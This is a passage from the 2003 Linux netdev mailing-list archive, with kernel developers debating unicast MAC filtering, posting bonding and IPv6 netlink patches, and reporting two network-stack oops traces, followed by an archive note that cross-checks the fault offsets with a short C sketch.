> then also add the original mac address to the 'unicast accept list' for
> instance).

This feature request comes up about once a year. Search the archives for responses...

Hardware that filters N MAC addresses (unicast filtering) doesn't have a terribly standard interface, and the unicast filter must be adjusted at different times on different hardware. Also, chip bugs lead one to think unicast filtering will work where it doesn't. Also, chip limits for some of the more popular chips are unknown. Also, the need for this feature is very uncommon, and can be achieved in other ways.

	Jeff

From rickp@rossfell.co.uk Thu Jul 31 08:45:26 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 08:45:32 -0700 (PDT)
Received: from rolf.rossfell.co.uk (rolf.rossfell.co.uk [81.2.65.139]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VFjFFl001387 for ; Thu, 31 Jul 2003 08:45:15 -0700
Received: from fozzy.rossfell.co.uk (fozzy.rossfell.co.uk [81.2.65.138]) by rolf.rossfell.co.uk (Postfix) with ESMTP id 6B33F642ED; Thu, 31 Jul 2003 16:09:28 +0100 (BST)
Date: Thu, 31 Jul 2003 16:09:26 +0100
From: Rick Payne
To: Jeff Garzik
Cc: netdev@oss.sgi.com
Subject: Re: multiple unicast mac address (was Re: netdev_ops retraction)
Message-ID: <2147483647.1059667766@fozzy.rossfell.co.uk>
In-Reply-To: <3F292B38.4070508@pobox.com>
References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <2147483647.1059659359@fozzy.rossfell.co.uk> <3F292B38.4070508@pobox.com>
X-Mailer: Mulberry/3.0.3 (Mac OS X)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
X-archive-position: 4413
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: rickp@rossfell.co.uk
Precedence: bulk
X-list: netdev

--On Thursday, July 31, 2003 10:44 am -0400 Jeff Garzik wrote:

> Hardware that filters N MAC addresses (unicast filtering) doesn't have a
> terribly standard interface, and the unicast filter must be adjusted at

Indeed but where it's possible to support it, it can be - and those cards will be specified by those who need it (for HA, VRRP etc).

> different times on different hardware. Also, chip bugs lead one to think
> unicast filtering will work where it doesn't. Also, chip limits for some
> of the more popular chips are unknown. Also, the need for this feature
> is very uncommon, and can be achieved in other ways.

As I said - promiscuous mode and filtering on the receive side - which is what you have to resort to anyway for those cards that don't support it.

Alternatively, it's just another patch people need to add to make things do what they want - just like the ARP patch.

Rick

From jgarzik@pobox.com Thu Jul 31 11:50:55 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 11:50:57 -0700 (PDT)
Received: from www.linux.org.uk (IDENT:1WYuSucE4i8h/KuTWFW/oNXdJGQ9iGNu@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VIorFl016520 for ; Thu, 31 Jul 2003 11:50:54 -0700
Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19iIVk-0006hQ-Pp; Thu, 31 Jul 2003 19:50:48 +0100
Message-ID: <3F2964FC.1030805@pobox.com>
Date: Thu, 31 Jul 2003 14:50:36 -0400
From: Jeff Garzik
Organization: none
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk
X-Accept-Language: en
MIME-Version: 1.0
To: Willy Tarreau
CC: davem@redhat.com, marcelo@conectiva.com.br, netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org
Subject: Re: [PATCH] 2.4.22-pre9-bk : bonding bug fixes
References: <20030730140658.GA14437@alpha.home.local>
In-Reply-To: <20030730140658.GA14437@alpha.home.local>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 4414
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jgarzik@pobox.com
Precedence: bulk
X-list: netdev

Applied patches 1 and 3, and will forward to Marcelo today.

From garzik@gtf.org Thu Jul 31 12:16:57 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 12:17:02 -0700 (PDT)
Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VJGtFl017262 for ; Thu, 31 Jul 2003 12:16:56 -0700
Received: by havoc.gtf.org (Postfix, from userid 500) id 3637E6685; Thu, 31 Jul 2003 15:16:46 -0400 (EDT)
Date: Thu, 31 Jul 2003 15:16:46 -0400
From: Jeff Garzik
To: marcelo@conectiva.com.br
Cc: alan@redhat.com, netdev@oss.sgi.com
Subject: [bk patches] 2.4.x net drvr bug fixes
Message-ID: <20030731191646.GA30639@gtf.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
X-archive-position: 4415
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jgarzik@pobox.com
Precedence: bulk
X-list: netdev

Marcelo, please do a

	bk pull bk://gkernel.bkbits.net/net-drivers-2.4

Others may download the patch (included below) from

ftp://ftp.??.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.4/2.4.22-pre10-netdrvr1.patch.bz2

This will update the following files:

 Documentation/networking/ifenslave.c |    3 +--
 drivers/net/bonding/bond_main.c      |   15 +++++++++------
 2 files changed, 10 insertions(+), 8 deletions(-)

through these ChangeSets:

(03/07/31 1.1051)
   [netdrvr bonding] fix ifenslave ia64 build

(03/07/31 1.1050)
   [netdrvr bonding] fix kernel panic when optional feature used

   - now the last one fixes a kernel panic due to a cheap hack which was
     introduced to determine the source IP address to use with ARP checks.
     It takes the first address of the first slave, and puts a lock on it.
     If there's no address, its ip_ptr is NULL, and the kernel panics while
     trying to get the lock. You can reproduce it easily this way :

     # modprobe eth0
     # modprobe bonding mode=active-backup miimon=1000
     # ip link set bond0 up
     # ifenslave bond0 eth0
     => kernel panic !

(03/07/31 1.1049)
   [netdrvr bonding] fix a typo in the MODULE_PARM_DESC

diff -Nru a/Documentation/networking/ifenslave.c b/Documentation/networking/ifenslave.c
--- a/Documentation/networking/ifenslave.c	Thu Jul 31 15:13:34 2003
+++ b/Documentation/networking/ifenslave.c	Thu Jul 31 15:13:34 2003
@@ -140,8 +140,7 @@
 #include
 #include
 #include
-#include
-#include
+#include
 #include
 #include
 #include
diff -Nru a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
--- a/drivers/net/bonding/bond_main.c	Thu Jul 31 15:13:34 2003
+++ b/drivers/net/bonding/bond_main.c	Thu Jul 31 15:13:34 2003
@@ -524,7 +524,7 @@
 MODULE_PARM(miimon, "i");
 MODULE_PARM_DESC(miimon, "Link check interval in milliseconds");
 MODULE_PARM(use_carrier, "i");
-MODULE_PARM_DESC(use_carrier, "Use netif_carrier_ok (vs MII ioctls) in miimon; 09 for off, 1 for on (default)");
+MODULE_PARM_DESC(use_carrier, "Use netif_carrier_ok (vs MII ioctls) in miimon; 0 for off, 1 for on (default)");
 MODULE_PARM(mode, "s");
 MODULE_PARM_DESC(mode, "Mode of operation : 0 for round robin, 1 for active-backup, 2 for xor");
 MODULE_PARM(arp_interval, "i");
@@ -1594,11 +1594,14 @@
 #endif
 			bond_set_slave_inactive_flags(new_slave);
 		}
-		read_lock_irqsave(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags);
-		ifap= &(((struct in_device *)slave_dev->ip_ptr)->ifa_list);
-		ifa = *ifap;
-		my_ip = ifa->ifa_address;
-		read_unlock_irqrestore(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags);
+		if (((struct in_device *)slave_dev->ip_ptr) != NULL) {
+			read_lock_irqsave(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags);
+			ifap= &(((struct in_device *)slave_dev->ip_ptr)->ifa_list);
+			ifa = *ifap;
+			if (ifa != NULL)
+				my_ip = ifa->ifa_address;
+			read_unlock_irqrestore(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags);
+		}

 		/* if there is a primary slave, remember it */
 		if (primary != NULL) {

From krkumar@us.ibm.com Thu Jul 31 13:38:04 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 13:38:29 -0700 (PDT)
Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VKbuFl024153 for ; Thu, 31 Jul 2003 13:38:03 -0700
Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6VKb8kh120936; Thu, 31 Jul 2003 16:37:09 -0400
Received: from linux-udp11920777uds.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6VKb6YF066986; Thu, 31 Jul 2003 16:37:07 -0400
Date: Thu, 31 Jul 2003 13:33:27 -0700 (PDT)
From: Krishna Kumar
X-X-Sender: krkumar@DYN318430
To: "David S. Miller"
cc: kuznet@ms2.inr.ac.ru, , , KK
Subject: Re: O/M flags against 2.6.0-test1
In-Reply-To: <20030730220223.4c25fcfe.davem@redhat.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 4416
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: krkumar@us.ibm.com
Precedence: bulk
X-list: netdev

> Ok, but then please use "__s32".

OK, slowly getting there :-) Latest patch follows :

Thanks,

- KK

-------------------------------------------------------------------------------
diff -ruN linux-2.6.0-test1.plist/include/linux/ipv6.h linux-2.6.0-test1.new/include/linux/ipv6.h
--- linux-2.6.0-test1.plist/include/linux/ipv6.h	2003-07-13 20:36:33.000000000 -0700
+++ linux-2.6.0-test1.new/include/linux/ipv6.h	2003-07-31 11:20:48.000000000 -0700
@@ -122,6 +122,52 @@
 	struct in6_addr daddr;
 };

+/*
+ * This structure contains configuration options per IPv6 link.
+ */
+struct ipv6_devconf {
+	__s32 forwarding;
+	__s32 hop_limit;
+	__s32 mtu6;
+	__s32 accept_ra;
+	__s32 accept_redirects;
+	__s32 autoconf;
+	__s32 dad_transmits;
+	__s32 rtr_solicits;
+	__s32 rtr_solicit_interval;
+	__s32 rtr_solicit_delay;
+#ifdef CONFIG_IPV6_PRIVACY
+	__s32 use_tempaddr;
+	__s32 temp_valid_lft;
+	__s32 temp_prefered_lft;
+	__s32 regen_max_retry;
+	__s32 max_desync_factor;
+#endif
+	void *sysctl;
+};
+
+/* index values for the variables in ipv6_devconf */
+enum {
+	DEVCONF_FORWARDING = 0,
+	DEVCONF_HOPLIMIT,
+	DEVCONF_MTU6,
+	DEVCONF_ACCEPT_RA,
+	DEVCONF_ACCEPT_REDIRECTS,
+	DEVCONF_AUTOCONF,
+	DEVCONF_DAD_TRANSMITS,
+	DEVCONF_RTR_SOLICITS,
+	DEVCONF_RTR_SOLICIT_INTERVAL,
+	DEVCONF_RTR_SOLICIT_DELAY,
+#ifdef CONFIG_IPV6_PRIVACY
+	DEVCONF_USE_TEMPADDR,
+	DEVCONF_TEMP_VALID_LFT,
+	DEVCONF_TEMP_PREFERED_LFT,
+	DEVCONF_REGEN_MAX_RETRY,
+	DEVCONF_MAX_DESYNC_FACTOR,
+#endif
+	DEVCONF_MAX
+};
+
 #ifdef __KERNEL__
 #include /* struct sockaddr_in6 */
 #include
diff -ruN linux-2.6.0-test1.plist/include/linux/rtnetlink.h linux-2.6.0-test1.new/include/linux/rtnetlink.h
--- linux-2.6.0-test1.plist/include/linux/rtnetlink.h	2003-07-31 12:00:39.000000000 -0700
+++ linux-2.6.0-test1.new/include/linux/rtnetlink.h	2003-07-31 11:30:57.000000000 -0700
@@ -477,10 +477,12 @@
 #define IFLA_MASTER IFLA_MASTER
 	IFLA_WIRELESS,	/* Wireless Extension event - see wireless.h */
 #define IFLA_WIRELESS IFLA_WIRELESS
+	IFLA_PROTINFO,	/* Protocol specific information for a link */
+#define IFLA_PROTINFO IFLA_PROTINFO
 };


-#define IFLA_MAX IFLA_WIRELESS
+#define IFLA_MAX IFLA_PROTINFO

 #define IFLA_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct ifinfomsg))))
 #define IFLA_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct ifinfomsg))
@@ -514,6 +516,18 @@
    for IPIP tunnels, when route to endpoint is allowed to change)
  */

+/* Subtype attributes for IFLA_PROTINFO */
+enum
+{
+	IFLA_INET6_UNSPEC,
+	IFLA_INET6_FLAGS,	/* link flags */
+	IFLA_INET6_CONF,	/* sysctl parameters */
+	IFLA_INET6_STATS,	/* statistics */
+	IFLA_INET6_MCAST,	/* MC things. What of them? */
+};
+
+#define IFLA_INET6_MAX IFLA_INET6_MCAST
+
 /*****************************************************************
  * Traffic control messages.
  ****/
diff -ruN linux-2.6.0-test1.plist/include/net/if_inet6.h linux-2.6.0-test1.new/include/net/if_inet6.h
--- linux-2.6.0-test1.plist/include/net/if_inet6.h	2003-07-13 20:38:43.000000000 -0700
+++ linux-2.6.0-test1.new/include/net/if_inet6.h	2003-07-31 11:25:46.000000000 -0700
@@ -16,7 +16,12 @@
 #define _NET_IF_INET6_H

 #include
+#include

+/* inet6_dev.if_flags */
+
+#define IF_RA_OTHERCONF 0x80
+#define IF_RA_MANAGED 0x40
 #define IF_RA_RCVD 0x20
 #define IF_RS_SENT 0x10

@@ -132,28 +137,6 @@
 #define IFA_SITE IPV6_ADDR_SITELOCAL
 #define IFA_GLOBAL 0x0000U

-struct ipv6_devconf
-{
-	int forwarding;
-	int hop_limit;
-	int mtu6;
-	int accept_ra;
-	int accept_redirects;
-	int autoconf;
-	int dad_transmits;
-	int rtr_solicits;
-	int rtr_solicit_interval;
-	int rtr_solicit_delay;
-#ifdef CONFIG_IPV6_PRIVACY
-	int use_tempaddr;
-	int temp_valid_lft;
-	int temp_prefered_lft;
-	int regen_max_retry;
-	int max_desync_factor;
-#endif
-	void *sysctl;
-};
-
 struct ipv6_devstat {
 	struct proc_dir_entry *proc_dir_entry;
 	DEFINE_SNMP_STAT(struct icmpv6_mib, icmpv6);
diff -ruN linux-2.6.0-test1.plist/net/ipv6/addrconf.c linux-2.6.0-test1.new/net/ipv6/addrconf.c
--- linux-2.6.0-test1.plist/net/ipv6/addrconf.c	2003-07-31 12:00:39.000000000 -0700
+++ linux-2.6.0-test1.new/net/ipv6/addrconf.c	2003-07-31 11:43:54.000000000 -0700
@@ -2510,7 +2510,107 @@
 	netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC);
 }

+static void inline ipv6_store_devconf(struct ipv6_devconf *cnf, __s32 *array)
+{
+	array[DEVCONF_FORWARDING] = cnf->forwarding;
+	array[DEVCONF_HOPLIMIT] = cnf->hop_limit;
+	array[DEVCONF_MTU6] = cnf->mtu6;
+	array[DEVCONF_ACCEPT_RA] = cnf->accept_ra;
+	array[DEVCONF_ACCEPT_REDIRECTS] = cnf->accept_redirects;
+	array[DEVCONF_AUTOCONF] = cnf->autoconf;
+	array[DEVCONF_DAD_TRANSMITS] = cnf->dad_transmits;
+	array[DEVCONF_RTR_SOLICITS] = cnf->rtr_solicits;
+	array[DEVCONF_RTR_SOLICIT_INTERVAL] = cnf->rtr_solicit_interval;
+	array[DEVCONF_RTR_SOLICIT_DELAY] = cnf->rtr_solicit_delay;
+#ifdef CONFIG_IPV6_PRIVACY
+	array[DEVCONF_USE_TEMPADDR] = cnf->use_tempaddr;
+	array[DEVCONF_TEMP_VALID_LFT] = cnf->temp_valid_lft;
+	array[DEVCONF_TEMP_PREFERED_LFT] = cnf->temp_prefered_lft;
+	array[DEVCONF_REGEN_MAX_RETRY] = cnf->regen_max_retry;
+	array[DEVCONF_MAX_DESYNC_FACTOR] = cnf->max_desync_factor;
+#endif
+}
+
+static int inet6_fill_ifinfo(struct sk_buff *skb, struct net_device *dev,
+			     struct inet6_dev *idev,
+			     int type, u32 pid, u32 seq)
+{
+	__s32 *array = NULL;
+	struct ifinfomsg *r;
+	struct nlmsghdr *nlh;
+	unsigned char *b = skb->tail;
+	struct rtattr *subattr;
+
+	nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*r));
+	if (pid) nlh->nlmsg_flags |= NLM_F_MULTI;
+	r = NLMSG_DATA(nlh);
+	r->ifi_family = AF_INET6;
+	r->ifi_type = dev->type;
+	r->ifi_index = dev->ifindex;
+	r->ifi_flags = dev->flags;
+	r->ifi_change = 0;
+	if (!netif_running(dev) || !netif_carrier_ok(dev))
+		r->ifi_flags &= ~IFF_RUNNING;
+	else
+		r->ifi_flags |= IFF_RUNNING;
+
+	RTA_PUT(skb, IFLA_IFNAME, strlen(dev->name)+1, dev->name);
+
+	subattr = (struct rtattr*)skb->tail;
+
+	RTA_PUT(skb, IFLA_PROTINFO, 0, NULL);
+
+	/* return the device flags */
+	RTA_PUT(skb, IFLA_INET6_FLAGS, sizeof(__u32), &idev->if_flags);
+
+	/* return the device sysctl params */
+	if ((array = kmalloc(DEVCONF_MAX * sizeof(*array), GFP_KERNEL)) == NULL)
+		goto rtattr_failure;
+	ipv6_store_devconf(&idev->cnf, array);
+	RTA_PUT(skb, IFLA_INET6_CONF, DEVCONF_MAX * sizeof(*array), array);
+
+	/* XXX - Statistics/MC not implemented */
+	subattr->rta_len = skb->tail - (u8*)subattr;
+
+	nlh->nlmsg_len = skb->tail - b;
+	kfree(array);
+	return skb->len;
+
+nlmsg_failure:
+rtattr_failure:
+	if (array)
+		kfree(array);
+	skb_trim(skb, b - skb->data);
+	return -1;
+}
+
+static int inet6_dump_ifinfo(struct sk_buff *skb, struct netlink_callback *cb)
+{
+	int idx, err;
+	int s_idx = cb->args[0];
+	struct net_device *dev;
+	struct inet6_dev *idev;
+
+	read_lock(&dev_base_lock);
+	for (dev=dev_base, idx=0; dev; dev = dev->next, idx++) {
+		if (idx < s_idx)
+			continue;
+		if ((idev = in6_dev_get(dev)) == NULL)
+			continue;
+		err = inet6_fill_ifinfo(skb, dev, idev, RTM_NEWLINK,
+				NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq);
+		in6_dev_put(idev);
+		if (err <= 0)
+			break;
+	}
+	read_unlock(&dev_base_lock);
+	cb->args[0] = idx;
+
+	return skb->len;
+}
+
 static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = {
+	[RTM_GETLINK - RTM_BASE] = { .dumpit = inet6_dump_ifinfo, },
 	[RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, },
 	[RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, },
 	[RTM_GETADDR - RTM_BASE] = { .dumpit = inet6_dump_ifaddr, },
diff -ruN linux-2.6.0-test1.plist/net/ipv6/ndisc.c linux-2.6.0-test1.new/net/ipv6/ndisc.c
--- linux-2.6.0-test1.plist/net/ipv6/ndisc.c	2003-07-13 20:35:12.000000000 -0700
+++ linux-2.6.0-test1.new/net/ipv6/ndisc.c	2003-07-31 11:24:39.000000000 -0700
@@ -1037,6 +1037,17 @@
 		in6_dev->if_flags |= IF_RA_RCVD;
 	}

+	/*
+	 * Remember the managed/otherconf flags from most recently
+	 * received RA message (RFC 2462) -- yoshfuji
+	 */
+	in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED |
+				IF_RA_OTHERCONF)) |
+				(ra_msg->icmph.icmp6_addrconf_managed ?
+					IF_RA_MANAGED : 0) |
+				(ra_msg->icmph.icmp6_addrconf_other ?
+					IF_RA_OTHERCONF : 0);
+
 	lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime);

 	rt = rt6_get_dflt_router(&skb->nh.ipv6h->saddr, skb->dev);

From zwane@arm.linux.org.uk Thu Jul 31 19:31:14 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 19:31:21 -0700 (PDT)
Received: from hemi.commfireservices.com ([66.212.224.118]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h712VCFl014808 for ; Thu, 31 Jul 2003 19:31:13 -0700
Received: from montezuma.mastecende.com (cuda.commfireservices.com [24.202.53.9]) by hemi.commfireservices.com (Postfix) with ESMTP id F2D96BC55 for ; Thu, 31 Jul 2003 22:20:06 -0400 (EDT)
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by montezuma.mastecende.com (8.12.8/8.12.8) with ESMTP id h712JVtE007393 for ; Thu, 31 Jul 2003 22:19:33 -0400
Date: Thu, 31 Jul 2003 22:19:31 -0400 (EDT)
From: Zwane Mwaikambo
X-X-Sender: zwane@montezuma.mastecende.com
To: netdev@oss.sgi.com
Subject: oops in udp_queue_rcv_skb
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 4417
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: zwane@arm.linux.org.uk
Precedence: bulk
X-list: netdev

I got this whilst doing transfers from a SAMBA server, kernel is 2.6.0-test2-mm2 on a 3way. Is there any specific information you require?

Unable to handle kernel paging request at virtual address c4734068
 printing eip:
c04e58b6
*pde = 00012067
Oops: 0000 [#1]
PREEMPT SMP DEBUG_PAGEALLOC
CPU:    0
EIP:    0060:[]    Not tainted VLI
EFLAGS: 00010246
EIP is at udp_queue_rcv_skb+0x276/0x3e0
eax: 00000000   ebx: c8977060   ecx: 00000104   edx: 00000001
esi: c4734004   edi: c8977004   ebp: 00000000   esp: c06dde78
ds: 007b   es: 007b   ss: 0068
Process swapper (pid: 0, threadinfo=c06dc000 task=c0623a20)
Stack: c897706c c06dc000 00000202 00000000 0300a8c0 cad60084 c4734004 c8977004
       cad60084 c97ef038 c04e5fe2 c8977004 c4734004 c06dc000 2003c000 0300a8c0
       ca789004 0300a8c0 0a00a8c0 c0687d18 00000000 c4734004 0a00a8c0 c04bcfc2
Call Trace:
 [] udp_rcv+0x222/0x3e0
 [] ip_local_deliver+0x102/0x270
 [] ip_rcv+0x37c/0x4e0
 [] netif_receive_skb+0x153/0x1d0
 [] process_backlog+0x87/0x160
 [] net_rx_action+0x84/0x160
 [] do_softirq+0xd3/0xe0
 [] do_IRQ+0x1b5/0x250
 [] default_idle+0x0/0x40
 [] common_interrupt+0x18/0x20
 [] default_idle+0x0/0x40
 [] default_idle+0x2e/0x40
 [] cpu_idle+0x3a/0x50
 [] rest_init+0x0/0x90
 [] start_kernel+0x171/0x190

Code: 43 86 57 68 ff 74 24 08 9d 8b 54 24 04 8b 42 14 48 89 42 14 8b 42 08 83 e0 08
 <0>Kernel panic: Fatal exception in interrupt
In interrupt handler - not syncing

(gdb) list *udp_queue_rcv_skb+0x276
0xc04e5cb6 is in udp_queue_rcv_skb (sock.h:942).
937
938		skb->dev = NULL;
939		skb_set_owner_r(skb, sk);
940		skb_queue_tail(&sk->sk_receive_queue, skb);
941		if (!sock_flag(sk, SOCK_DEAD))
942			sk->sk_data_ready(sk, skb->len);
943	out:
944		return err;
945	}
946

-- 
function.linuxpower.ca

From zwane@arm.linux.org.uk Thu Jul 31 22:46:45 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 22:46:54 -0700 (PDT)
Received: from hemi.commfireservices.com ([66.212.224.118]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h715kiFl005576 for ; Thu, 31 Jul 2003 22:46:45 -0700
Received: from montezuma.mastecende.com (cuda.commfireservices.com [24.202.53.9]) by hemi.commfireservices.com (Postfix) with ESMTP id E2531BC55 for ; Fri, 1 Aug 2003 01:35:38 -0400 (EDT)
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by montezuma.mastecende.com (8.12.8/8.12.8) with ESMTP id h715Z4tE020982 for ; Fri, 1 Aug 2003 01:35:05 -0400
Date: Fri, 1 Aug 2003 01:35:04 -0400 (EDT)
From: Zwane Mwaikambo
X-X-Sender: zwane@montezuma.mastecende.com
To: netdev@oss.sgi.com
Subject: oops in raw_rcv_skb
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 4418
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: zwane@arm.linux.org.uk
Precedence: bulk
X-list: netdev

You can reproduce this one easily by doing 5-6 ping -f of a system on the network (not loopback), originally picked up at http://bugme.osdl.org/show_bug.cgi?id=937

Unable to handle kernel paging request at virtual address c5100068
 printing eip:
c02ae8b6
*pde = 00015067
*pte = 05100163
Oops: 0000 [#1]
CPU:    0
EIP:    0060:[]    Not tainted
EFLAGS: 00010246
EIP is at raw_rcv_skb+0x156/0x220
eax: 00000040   ebx: c52ed060   ecx: c4f6e024   edx: 00000014
esi: c52ed004   edi: c5100004   ebp: c52ed06c   esp: c5661d24
ds: 007b   es: 007b   ss: 0068
Process ping (pid: 283, threadinfo=c5660000 task=c585f000)
Stack: c5100000 c1169890 00001000 00000206 00000000 c1169890 c5100000 0000005a
       c5100004 c52ed004 c4f6e024 c54a2004 c02aea1d c52ed004 c5100004 c54a2038
       00000030 00000001 c52ed004 c02ae569 c52ed004 c5100004 6164050a 1964050a
Call Trace:
 [] raw_rcv+0x9d/0x110
 [] raw_v4_input+0xa9/0x130
 [] ip_local_deliver+0x8b/0x200
 [] ip_rcv+0x37c/0x47a
 [] kernel_map_pages+0x28/0x5c
 [] netif_receive_skb+0x165/0x1f0
 [] process_backlog+0x89/0x120
 [] net_rx_action+0x91/0x110
 [] do_softirq+0xd5/0xe0
 [] do_IRQ+0x165/0x220
 [] common_interrupt+0x18/0x20
 [] pirq_sis_get+0x9b/0xc0
 [] fput+0x2/0x20
 [] poll_freewait+0x35/0x50
 [] do_select+0x201/0x350
 [] __pollwait+0x0/0xd0
 [] sys_select+0x2db/0x4e0
 [] pirq_sis_get+0x9b/0xc0
 [] syscall_call+0x7/0xb

Code: 8b 47 64 89 34 24 89 44 24 04 ff 96 50 01 00 00 eb b2 0f 0b
 <0>Kernel panic: Fatal exception in interrupt
In interrupt handler - not syncing

-- 
function.linuxpower.ca
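
[Archive note] A rough cross-check of the two oops reports above, offered as a sketch rather than a diagnosis. In both dumps the faulting virtual address lies 0x64 bytes past a value held in a register: esi in the udp_queue_rcv_skb report, edi in the raw_rcv_skb report. The Code bytes of the second report begin with 8b 47 64, which decodes as a 32-bit load from 0x64(%edi). That would be consistent with the skb->len read in the sk->sk_data_ready(sk, skb->len) line of the gdb listing, but only on the assumption, not confirmed anywhere in the thread, that the register holds the skb pointer and that len sits at offset 0x64 in these builds. The struct and function names below are hypothetical and exist only to show the arithmetic.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One register/fault pair copied from an oops report. */
struct oops_sample {
    const char *where;      /* symbol from the "EIP is at" line */
    const char *reg_name;   /* register assumed to hold the base pointer */
    uint32_t    reg_value;  /* register value from the dump */
    uint32_t    fault_addr; /* "virtual address" from the first oops line */
};

/* Hypothetical helper: byte offset of the faulting access from the register. */
static uint32_t fault_offset(const struct oops_sample *s)
{
    return s->fault_addr - s->reg_value;
}

/* Values taken verbatim from the two reports. */
static const struct oops_sample samples[] = {
    { "udp_queue_rcv_skb+0x276", "esi", 0xc4734004u, 0xc4734068u },
    { "raw_rcv_skb+0x156",       "edi", 0xc5100004u, 0xc5100068u },
};

/* Print "fault = <reg> + <offset>" for each sample. */
void print_offsets(void)
{
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("%s: fault = %s + 0x%x\n", samples[i].where,
               samples[i].reg_name, (unsigned)fault_offset(&samples[i]));
}
```

Calling print_offsets() from a small main() reports an offset of 0x64 for both samples. Matching offsets alone do not show that the two reports share a cause; they only suggest the same structure field is being read in both paths.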